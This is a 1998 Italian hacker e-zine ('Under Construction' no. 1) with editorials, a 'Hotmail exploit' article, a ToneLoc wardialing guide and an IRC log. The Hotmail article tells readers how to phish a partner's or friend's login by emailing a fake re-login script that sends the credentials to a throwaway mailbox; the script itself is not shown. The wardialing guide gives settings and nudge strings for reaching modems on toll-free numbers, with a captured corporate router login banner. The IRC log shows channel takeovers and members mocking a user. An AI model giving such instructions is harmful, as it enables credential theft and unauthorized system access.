ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ þ UnDeR CoNsTrUcTiOn þ [Nø0001] ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ >>>>>>>>>>>>>>>>>>>>>>> UnDeR CoNsTrUcTiOn MeMbErS <<<<<<<<<<<<<<<<<<<<<< ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ madsem, UncleScan, TrUsA, Li-Nux, Nullmind, NightWolf, Chatr0bot, NegMan ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ HACKING --- PHREAKING --- VIRII --- CRACKING --- IRCWAR --- WAREZ --- MP3 ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ Ci trovate su IRCnet #phreak.it !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! ³ ³ La scena italiana si capovolge con un nuovo gruppo underground ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ þ Eccocci qui, finalmente con il numero 1 di Under Construction, tutti noi ne siamo fieri, io personalmente, non immagginate quanto :) In questo numero io, Li-Nux, faro' da redattore lasciando pero' tutte le note di madsem del numero zero, che non Š disponibile al pubblico. ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ DiScLaImEr: ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ Ricordiamo che qualsiasi applicazione illegale non e' approvata dalla ³ ³ UnDeR CoNsTrUcTiOn, tali informazioni vengono divulgate per proteggerci ³ ³ da eventuali truffe, non per crearne, comunque il gruppo non si assume ³ ³ nessuna responsabilita' sulle applicazioni illecite che possono essere ³ ³ realizzate .... Noi diffondiamo cultura, non illegalita' ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ MeNuZz [UnDeR CoNsTrUcTiOn] --- Articoli ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ ³ ³ þ 1] Editoriale Nø1 >>>>>>>>>>>>>>>>>>> UncleScan ³ ³ þ 2] Editoriale Nø2 >>>>>>>>>>>>>>>>>>> madsem ³ ³ þ 3] Hotmail Exploit >>>>>>>>>>>>>>>>>>> NullMind ³ ³ þ 4] Siamo o non siamo Scannisti >>>>>>>>>>>>>>>>>>> NegMan ³ ³ þ 5] Log del canale #phreak.it >>>>>>>>>>>>>>>>>>> ChatR0bot ³ ³ þ 6] Cellular Tips & Tricks & News >>>>>>>>>>>>>>>>>>> ChatR0bot ³ ³ þ 7] Identificare, Attaccare, >>>>>>>>>>>>>> ³ ³ Eliminare ed Eludere la >>>> NightWolf ³ ³ Sicurezza Fisica ed i Sistemi >>>> ³ ³ di Rilevamento Intrusione >>>>>>>>>>>>>> ³ ³ þ 8] Indice Nø1 TJ LOD/H >>>>>>>>>>>>>>>>>>> NightWolf ³ ³ þ 9] Custom Local Area Signalling Services >>>>>>>>>>>>>>>>>>> NightWolf ³ ³ þ 10] Applicazioni malsane del Back Orifice >>>>>>>>>>>>>>>>>>> TrUsA ³ ³ þ 11] NonSoloPhreakin' >>>>>>>>>>>>>>>>>>> ChatR0bot ³ ³ þ 12] Vecchi server... servono... >>>>>>>>>>>>>>>>>>> Li-Nux ³ ³ þ 13] CaSiNo... vi fara' tremare >>>>>>>>>>>>>>>>>>> Li-Nux ³ ³ þ 14] Disinfettazione di un file infetto >>>>>>>>>>>>>>>>>>> Li-Nux ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ þ [EDITORIALE 22/09/1998] UnDeR CoNsTrUcTiOn ³ ³ [MaStEr SeCtIoN] :) Articolo di: UncleScan ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ "Punto di riferimento", non credo ci possano essere definizioni piu' appropriate, per il gruppo di U.C., che solo da poche setimane sta ampliando la rete di collaboratori e semplici curiosi. U.C. , non vuole essere la solita congrega di amiconi telematici, che si gestisce in modo casereccio e alle volte penalmente rilevante gli ultimi trucchetti di phreak, o ancor di piu' , che mira a crakkare qualche sito "OFF LIMITS" per poi sventagliare ai quattro venti ,la lamerata di turno, o amenita' simili : ). Ma, il vero spirito , quello filosofico, motivazionale, quello che in ultima analisi, permette di essere riconosciuti, e' quello esclusivamente di portare l'informazione ad ogni livello, consentendo all'utente medio, al neofita, o al tipo + tosto di trovare valido, dialogo, eventualmente, valido punto di partenza, per meglio ampliare studi, e ricerche o in enmbrione o in itinere, scoraggiando fin d'ora, persone che usino accortezze di svariato tipo per commettere reati, od ancora piu' detestabile, danneggiare sistemi, con cui persone traggono il sostentamento da tali risorse! Entrando nel Cybermondo, si possono trovare sicuramente siti o pubblicazioni, che potranno essere + interessanti, o migliori delle nostre, e lo sappiamo, ma ora come ora ci stiamo mettendo tutto l'impegno perche' questa e-zine sia pubblicata con contenuti che possano essere apprezzabili, e credetemi , le pubblicazioni e gli articoli contenuti, sono interessanti, perche' comunque provengono da personaggi preparati e molto umili, che sono sempre disposti a mettere in discussione le loro convinzioni ed i loro studi. Alla prossima ..... E-ZiNe nø2 UncleScan (Zio Scanno x gli amici ;)) ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ þ [EDITORIALE Nø2 22/09/1998] UnDeR CoNsTrUcTiOn ³ ³ [MaStEr SeCtIoN] :) Articolo di: madsem ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ 20.30 del 22/09/1998 ke vita sciacquina .... Da oggi cominciano a cambiare un po' di cose ... tra poco esce il numero zero (uno NdR) di UnDeR CoNsTrUcTiOn , la nostra e-zine ... io da oggi kambio la mia vita ... forse e' finita la mia ennesima storia d'amore ... almeno il pc non mi tradisce ... e' finita la birra ... almeno non mi distraggo ... sono finite le sigarette ... almeno qui' dentro si respira ... scrivo la presentazione al numero zero (uno cazzo NdR :) e non penso piu' a nulla ... UnDeR CoNsTrUcTiOn e' nata un mese fa' ... Da quel giorno e' nata una strettissima collaborazione tra tutti gli amici di #underc, una piccola cosa di cui andare fieri infatti noi siamo fieri di quello che siamo, dei semplici ragazzacci che se ne raccontano di tutti i colori, degli amici di cui fidarsi, delle persone come Trusa, in perenne azione, come UncleScan, sempre disponibile con i suoi piccoli aiuti, NightWolf, che tra poco si mettera' a programmare anche gli accendini (non credo che sia lontano il giorno in cui dira' che ha creato un virus che fa' spegnere gli accendini !!!!!), come NullMind, il nostro angelo custode, come Li-Nux , traduce piu' velocemente del traduttore della IBM !!!, come NegMan, sicuramente uno dei migliori scanner in italia, e come Chatrobot, sempre con le sue gogliardate , e come The_Crazy , non si sa' mai se e' vivo o no. Ognuno di noi ha fatto la sua parte, ha scritto, ha spiegato, ha cercato, ha elaborato. RAGAZZI: ABBIAMO CREATO QUALCOSA INSIEME PARTENDO DAL NULLA !!! Grazie, grazie a tutti, siamo nati sotto una buona stella (Ne sono convinto NdR :) Vostro, madsem. (Sei mitico !!! NdR :) ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ þ [HotMail Exploit 22/09/1998] UnDeR CoNsTrUcTiOn ³ ³ [HaCkInG SeCtIoN] :) Articolo di: NullMind ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Vi e' mai capitato di voler leggere l'email della vostra ragazza o del vostro amico a cui volete fare da tanto un piccolo scherzetto? Bene, se lui ha un account su HotMail avete alcune possibilita' di riuscirci, basta sapere un po' di codice Java ... L'unica cosa che dovete fare e' mandare un email che contiene del codice java al povero malcapitato. Quando l'utente leggera' le sue email lo scriptino in java contenuto in una di quelle forzera' l'utente a rifare il login. Cosi' l'user, la password e l'indirizzo ip della vittima vi verranno trasmesse sulla vostra casella di posta elettronica. Non usate la vostra vera e-mail, fatevi un account su Geocities se volete usarlo... ma questo e' inutile dirlo, vero ?! ;) adesso una parte dello scriptino in java da salvare come messages.htm (la linea 17 include il nostro user name su Geocities, in questo caso [ybwc]) :

"Go where you want today" - Blue Adept

a questo punto salvate il tutto come messages.htm e inserite il file nella e-mail da mandare alla vostra vittima ad es. pirla@hotmail.com e aspettate che lo script faccia il resto... troverete user, password e ip nella vostra casella di posta. Semplice no ;) E adesso per la gioia della controparte un piccolo fix per impedire che qualcuno prenda possesso dei vostri dati: disabilitate javascript del vostro browser. Se state usando Netscape andate in edit poi in preferences, advanced, disable javascript. Se invece (ahime') state usando Microsoft Internet Explorer andate in view, poi in internet options, security, custom settings, scripting, disable active scripting. Ciao a tutti dalla Under Construction P.s. Si accettano critiche e non... ;) nullmind@freemail.it >> null , sei un grande !!! << >> .... ora e' il momento di un bel articolo di negman !!!<< ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ þ [Siamo o non siamo scannisti 22/09/1998] UnDeR CoNsTrUcTiOn ³ ³ [PhEaKiNg SeCtIoN] :) Articolo di: NegMan ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ________________________________________________________________ | | | | | DISCLAIMER: Tutte le info descritte in questo articolo hanno | | uno scopo puramente informativo. | | L'autore declina da ogni responsabilita' per | | eventuali danni a cose o a persone causati | | dall'utilizzo improprio di tali info. | | | | NeGMaN | |________________________________________________________________| PREMESSA: Questo articolo e' stato scritto secondo l'etica che UnDeR CoStRuCtIoN si e'prefissata di seguire, ossia la possibilita' di far avvicinare all'underground digitale tutti coloro che ne fossero interessati, senza creare nessun tipo di barriera. REMEMBER: LA CONOSCENZA E' DI TUTTI Hi boy, dopo lunghe ore di mIRCate, mi sono deciso a scrivere qualcosina sul WaRdIaLiNg. La prima volta che ho sentito qualcosa del genere e' stato nel 1983, con l'uscita del film War Games. Il protagonista del film non faceva altro che far chiamare al proprio computer una miriade di numeri telefonici con la speranza di riuscire a beccare il numero di una famosa software-house, per potersi scaricare dei demo. Logicamente quello era solo un film, ma proprio grazie a quel film che in Italia si inizio' a parlare di wardialing. Infatti ricordo che proprio in quegli anni parti' in Italia la commercializzazione dei computer da parte della Commodore (VIC20 e C64), e successivamente la vendita dell' Adattore Telematico 6499 a 300 baud. Cosi' anche in Italia si inizio' a fare del Wardialing con dei programmini autoprodotti che si riuscivano a trovare in qualche rarissima bbs. E' immininente pensare che a quei tempi il wardialing era anche associato a qualche truffa che si compieva ai danni della SIP. Mentre invece con la nascita dei green (167 per intenderci), le cose sono un po' cambiate. Bisogna certo dire che come al solito l'Italia e' un paese che dorme un po' troppo, in quanto negli USA i cosidetti numeri non-charge fecero la comparsa circa 10 anni prima....:)) In Italia, con la diffusione dei gr33n, il wardialing ha trovato terreno fertile e oggi si possono trovare in rete tantissimi programmi che permettono ai nostri computer di scannare per interi giorni. Io personalmente ho una predilizione per il ToneLoc, un prg molto flessibile e facilmente adattabile a qualsiaisi situazione. TONELOC La prima cosa da fare sarbbe quella di stampare (una volta scompattato il file TL110.zip) i file tl-user.doc e tl-ref.doc , file importantissimi per capire il perfetto funzionamento del ToneLoc. Si passa poi alla configurazione del prg, attraverso il file tlcfg.exe Tralasciando le configurazioni standard del programma (Modem, Init String, Com, etc.), mi soffermerei soprattutto sul menu' ScanOptions il quale presenta alcune voci importantissime: - Between-call-Delay : si va ad inserire il tempo in millisecondi che il ToneLoc aspetta prima di effettuare un' altra chiamata. Questo valore e' molto importante perche' permette di adattare il ToneLoc ai diversi modem, anche quelli piu' datati. Infatti con quest'ultimi un valore >600 va piu' che bene. - Wait Delay : Il valore che andremo ad inserire qui ci permette di stabilire per quanto tempo (in millisecondi) il Toneloc aspettera', una volta ricevuto un carrier o un tone , prima di riagganciare e passare alla prossima chiamata. Anche qui e' consigliabile immettere un valore >30000 se si vuole effettuare uno scanning approfondito, oppure per un lavoro piu' veloce un 20000 andrebbe benissimo. - Scan For : Se volete ciullare quello che vi interessa maggiormente settate questo valore ad 1 :)) - Nudge String : Ci permette di stabilire la stringa che il ns computer mandera' al momento della connessione ad un computer remoto. Questo forse e' il settaggio piu' importante del TonLoc per ottenere i migliori risultati. Ci sono alcuni computer che una volta chiamati, aspettano l'invio di alcuni caratteri per poter poi rispondere. Con questa stringa andremo a settare quei caratteri da sendare al computer remoto, per poi avere una risposta. Ricordate che se non viene sendato il carattere o i caratteri esatti, il computer remoto non vi rispondera' mai, e nel file di log trovere una situazione simile: 08-Mar-97 13:48:51 167xxxxxx C: CONNECT 57600 <*CARRIER LOST (11 sec.)*> Come si vede in questo esempio la connessione e' stata persa dopo 11 secondi proprio perche' la stringa sendata dal ns computer non e' stata accettata dal computer remoto. In questo caso allora il lavoro diventa' piu' difficile poiche' bisogna fare diversi tentativi per scoprire "cosa" attende il computer remoto per attivare la connessione. In quest'altro esempio si puo' notare invece come il computer remoto ha attivato la connessione utilizzando questa stringa: Nudge String: ~~|||~~ ~ mezzo secondo di ritardo prima di sendare il resto della stringa | senda un [ENTER] al pc remoto 10-Mar-97 16:14:04 16701xxxx C: CONNECT 57600 _________________/\___ __ __ __ __ __ _________________/\___ / /_ / /_ / / / /|/| _________________/\___ / /_ /_ /_ /_ /_/ / / _________________/\_________________________ ITALIA ---------------------------------------------- | |\ | CISCO 2504 | | | Cliente: Christian Dior | | | Sede: PISA | | | by LT | | ---------------------------------------------- | \_____________________________________________\| !!!! ATTENZIONE: Ogni accesso non autorizzato e' proibito !!!! !!!! WARNING: Unauthorized access is prohibited !!!! User Access Verification Username: C'e' pero' da considerare che non e' sempre cosi' facile, che un computer ci risponda accettando un semplice [ENTER]. Nella maggior parte dei casi bisogna invece sendare diversi caratteri prima che la connessione sia attivata. ALCUNI ESEMPI DI NUDGE STRING Nudge String: ~~\\~~| Nudge String: ~~~...~~~| Nudge String: ~~^q~~ Come si puo' notare ci vuole un po' di "fantasia" e il GIOCO e' fatto !!!!! ----------------------------------------------------------------------------- CONSIDERAZIONI SULLA LEGALITA' DEL WARDIALING Sulla legalita' o meno del wardialing, ci sono da fare diverse considerazioni: - da un punto di vista tecnico, nessuna legge vieta la possibilita' di poter chiamare 1000 numeri al giorno, ne tantomeno la telekom lo puo' impedire. Questo quindi dovrebbe valere anche per i gr33n i quali sono dei numeri che la telekozz pubblica annualmente, quindi niente di riservato. Un consiglio, andatevi a spulciare per bene quel manualetto che vi arriva insieme agli elenchi telefonici su tutti i green attivati dalle aziende......ci possono essere delle gradite sorprese...:))) - Ricordiamoci che pero' l'azienda che gestisce la rete fissa telefonica e' la TeleZozz, nota per la sua taccagine e per il suo motto: " Inculare il prossimo ". Quindi penso che se da qualche tabulato esce fuori un utente che abbia fatto circa 10.000 chiamate a numeri verdi nell'arco di un mese, bene, PENSO che la TelePorc certamente non sta' li a guardare. - Si potrebbe pero' ANCHE pensare (forse per rincuorarci) che con tutti i casini che TeleKorn ha in casa sua, non si va ad incasinare ancor di piu' cercando di dare la caccia alle streghe. Tranne se pero' forse non si va' ad "attaccare" qualche SUO gr33n.........quindi state molto attenti !!!! " ragazzo non avevi mai capito, che si poteva essere un vero fuorilegge senza neanche uscire dalla tua camera ? " [Bruce Sterling " Giro di vite contro gli hacker " 1993 Shake] Buon WaRdIaLiNg !!!!! NeGMaN >> rimangono sottointesi i vari risvolti ... OKKIO !!!!!<< >> passiamo alle leggende cyber ... un articolo dedicato a madhatt !!!!!<< ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ þ [Log del canale #phreak.it 22/09/1998] UnDeR CoNsTrUcTiOn ³ ³ [LaMeR SeCtIoN] :) Articolo di: ChatR0bot ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Questo e' il log del chat con un lamer con il quale mi sono spacciato da "Warez - Greenz BOT" un po' tecnologicamente avanzato... leggete e ridete! #phreak.it buffer saved on Tue Sep 08 07:58:27 1998 *** Now talking in #phreak.it *** Daed3luS is now known as D4eDaeluS *** Anti-S (AntiS@a-kl1-61.tin.it) has joined #phreak.it ciao ciao *** madsem (~madsem@c-to5-160.tin.it) has joined #phreak.it ciao a tutti !!!! ueh mad! /msg m0rg4na op mads :))))))))))))))))))))))))))))))))))))))))))))))) kazzo di javairc !!!!! tutto bene ? abbastanza tranne che morgana non mi oppa, non so perche' sapete del takeover ke abbiamo fatto ? #umbria? non sono a kasa ... non posso resettarla .... #udine ah si ehehehehehehehehe !!!!!! vediamo come va su #roma *** M0rg4nj sets mode: +o madsem ah no che scemo! e' chiaro che non mi oppa -M0rg4nj- Access denied. chiamo dall'altro provider! -M0rg4nj- Added hostmask: *!ChatRobot@194.177.107.* *** M0rg4nj sets mode: +o ChatRobot Brava morgana, sei una figona :) null e' un guru !!! Qui entra il nostro soggetto: MADHATT! e Tillu, il nostro bot, lo banna subito perche' e' gia' un lamer noto nel canale... *** madhatt (~ak.madhat@ppp-cesena86-122.iol.it) has joined #phreak.it *** Tillu sets mode: +b madhatt!*@* *** madhatt was kicked by Tillu (banned: requestÏ) uh... *** Retrieving #phreak.it channel info... *** ChatRobot sets mode: -b madhatt!*@* vediamo *** Blum (Blum@195.223.184.250) has joined #phreak.it Qui inizio a provocarlo... madsem e' un complice ovviamente... -> *madhatt* De-Banned now *** madhatt (~ak.madhat@ppp-cesena86-122.iol.it) has joined #phreak.it *** ChatRobot sets mode: -o Tillu *** M0rg4nj sets mode: +o Tillu *** D4eDaeluS sets mode: +o Tillu chi a messo su chat robot ? e' un bot in prova e'e' approvatelo! allora io ho un green ma non so come farlo funzionare! No GrReEnS PlEaSe! io ne ho un elenko telefonico ...... perche? che strano bot parla! ???? mai visto un bot cosi' *** M0rg4nj is now known as M0rg4na te l'ho detto ke e' in prova ... e' un nostro progetto ..... pero' avete ragione a metterlo in prova riconosce le parole in kanaletta perche in un canale di phreaking se non parli di green No GrReEnS PlEaSe! di che parli ? e' antipula ... green green green green green Are U LaMeR?! no and you ? io penso di si' non hai un bel pensiero ehehehehehehehehehe ! poi che parole dice sto bot ? cosa sa dire ? dipende da quello ke scrivi .... guarda : hacking e lui : Good Thing DUDE! cracking oppure : Good Thing DUDE! pula! Fuck0ff!!! Mad Hatters lamer Mothafucker Is number one! ti piace ? bello! poi e finito ? ho dei problemi con la shell .... okkupa circa 80 mb .... mettici Mad Hatters = e' il numero uno! ok ? vuoi vedere una kosa karina ????? si bsta che non mi banni e non mi kikki underconstruction e lui : UnDeRcOnStRuCtIoN?!?!?! UnDeRcOnStRuCtIoN?!?!?! UnDeRcOnStRuCtIoN RuLeZ! questo e l'ultimo ? nono guarda : madsem The Best Boy all arount the world :) baa figo vero ? i bot dovrebbero andare anche loro a scuola! ehehehehehehehehehe !!!! e i lamer ??? i lamer dovrebbero sparire! allora ke ci fai ankora qua ?????? ;-))))) molto spiritoso fa' anke da server come arkivio warez .... ascolta oppami prova a kollegarti in dccchat nel bot con il bot ???? yep DCC Chat connection established Ready A questo punto madhatt e Blum chattano con me in DCC, vedete alla fine del file... che gli dico? yes ??? o si dovrebbe darti il prompt dei komandi no se fermato ????? strano ma perche non l'hai fatto in italiano ? uffa :-( adesso sto antipatico pure ai bot! :-(((( essendo legato alla lod non posso farlo in italiano .... ha il riconoscimento automatiko dei loozers !!!! prova a scrivere help aspett forse devo scrivere .help !!! No help available, insert password firs t loggati cioe? cosa vuol dire loggati ? * ChatRobot has detected 2 lamers in #phreak.it !!! *** NullMind (nullmind@hd45-216.hil.compuserve.com) has joined #phreak.it ciao null !!!!! re all ciao mad :) ciaoooooo Hi NullMind, givin'op... che dici di bello *** ChatRobot sets mode: +o NullMind io sono nella ***** non mi funziona un green 10x null ----) query ma tra un po' esco solo un attimo dimmi insomma come devo fare con sto boT ?????? *** madhatt was kicked by ChatRobot (ChatRobotÏ) *** madhatt (~ak.madhat@ppp-cesena86-122.iol.it) has joined #phreak.it *** madhatt was kicked by Tillu (banned: requestÏ) loggati !!!! EHEHE TUTTO LOGGATO!!!! Ora faccio un bel cut & paste :) Bravo blum :) di cosa *** Tillu sets mode: -b madhatt!*@* di cosa? hai provato a loggarti una volta di troppo !!!! io? eri in dcc pure tu' ciao ci vediam staseraaaaaaaaaa si ciao null !!!! hai cercato di loggarti nel bot ? *** NullMind (nullmind@hd45-216.hil.compuserve.com) has left #phreak.it (NullMindÏ) ho scitto .help *** Galileo^ (nmwefc@ppp9-va.xcom.it) has joined #phreak.it salve bravo ! e poi ? ciao galileo ! scusa ma siamo nel difficile .... e poi basta strano ... devo verificare il log appena sono a kasa .... ok ragazzi visitate il mio sito www.angelfire.com/on/sectoronex/index.html kosa proponi nel sito ??? Session Close: Tue Sep 08 08:18:55 1998 Session Start: Tue Sep 08 08:21:39 1998 * Logging #phreak.it to: [#phreak_it.log] bello l'ho gia' visitato Free Op only for assholes! :) senti Anti-S mi fai entrare in hackers.it? anche me fammi antrare li *** Retrieving #phreak.it channel info... allora posso entrare ?? *** ChatRobot changes topic to "ChatRobot Surveillance Mode against > madhatt <Ï" cosa vuol dire non sei a kasa ?? ????? sono in ufficio e allora ? oppami nel bot! NullMind che dice adesso il bot ? NullMind is a UnderC member! madhatt madhatt is an asshole Tillu Hackers.it non è perotetto puo entere chi vuole Tillu is a big dick guy! madhatt 6 bello!! madhatt is an asshole I fuck your asshole : P asshole is madhatt bello io ? se non mi hai neanche visto asshole is always asshole boh ... io vado a kasa .... ci vediamo piu' tardi .... no oppami nel bot controllo io il canale! :-))) -Hello MadSem-!!!! hello chatrobot HO L'IP DEL NEGOZIO !!! NON QUELLO DI KASA !!! NON POSSO ACCEDERE AL BOT !!!!!!!! *** ChatRobot sets mode: +m *** D4eDaeluS sets mode: -m hello madhatt ok how are you ? buonanotte a tutti !!!! *** ArmaLetal (peppo@ppp4-va.xcom.it) has joined #phreak.it io vado a fare cena !!! dove lavori ???? in un negozio di pc dove? to a torino ? y e' tuo il negozio ? y fai molti $o£di ? te lo dico la prossima volta .... *** madsem (~madsem@c-to5-160.tin.it) has left #phreak.it (madsemÏ) No More UnDeRcOnStRuCtIoN Members in channel > -#phreak.it- < ! ChatRobot ChatRovot v1.02 (C) 1998 by UnderC underc UnDeRcOnStRuCtIoN! warez I'm a WaReZ bot... DCC ME Qui c'e' stato un piccolo sbaglio mio, ho buttato il log nel canale, ma il lamer non se n'e' accorto... Session Start: Tue Sep 08 07:58:10 1998 * Logging #phreak.it to: [lamer.log] io penso di si' non hai un bel pensiero ehehehehehehehehehe ! poi che parole dice sto bot ? cosa sa dire ? dipende da quello ke scrivi .... guarda : hacking e lui : Good Thing DUDE! cracking oppure : Good Thing DUDE! pula! Fuck0ff!!! Mad Hatters lamer Mothafucker Is number one! madhatt < #phreak.it topic set by ChatRobot on Tue Sep 08 20:06:14 un bot che kikka l'altro bot! *** M0rg4na sets mode: +o ChatRobot *** madhatt was kicked by ChatRobot (ChatRobotÏ) *** Galileo^ has quit IRC (Ping timeoutÏ) *** madhatt (~ak.madhat@ppp-cesena86-122.iol.it) has joined #phreak.it *** ChatRobot sets mode: -o Tillu kikka *** D4eDaeluS sets mode: +o Tillu *** M0rg4na sets mode: +o Tillu *** ChatRobot sets mode: -ooo D4eDaeluS M0rg4na Tillu Protection Mode 4 ChatRobot *** Anti-S (AntiS@a-kl1-61.tin.it) has joined #phreak.it hhaah un bot che toglie l'op agli altri bot! Qui entra Truijllo e lo faccio diventare "complice" del gioco! *** Truijllo (graffiti@a-ca7-4.tin.it) has joined #phreak.it hahhaahha *** ChatRobot sets mode: +o M0rg4na salve ! questa e bella salve chatrobot ! *** Galileo (nmwefc@ppp9-va.xcom.it) has joined #phreak.it Truijllo: Hello *** hollenhun (~x@www.leslee.com) has joined #phreak.it *** ChatRobot sets mode: +o D4eDaeluS *** ChatRobot sets mode: +o Tillu *** hollenhun (~x@www.leslee.com) has left #phreak.it (hollenhunÏ) raga...è da un po di tempo che vedo sti bot qua 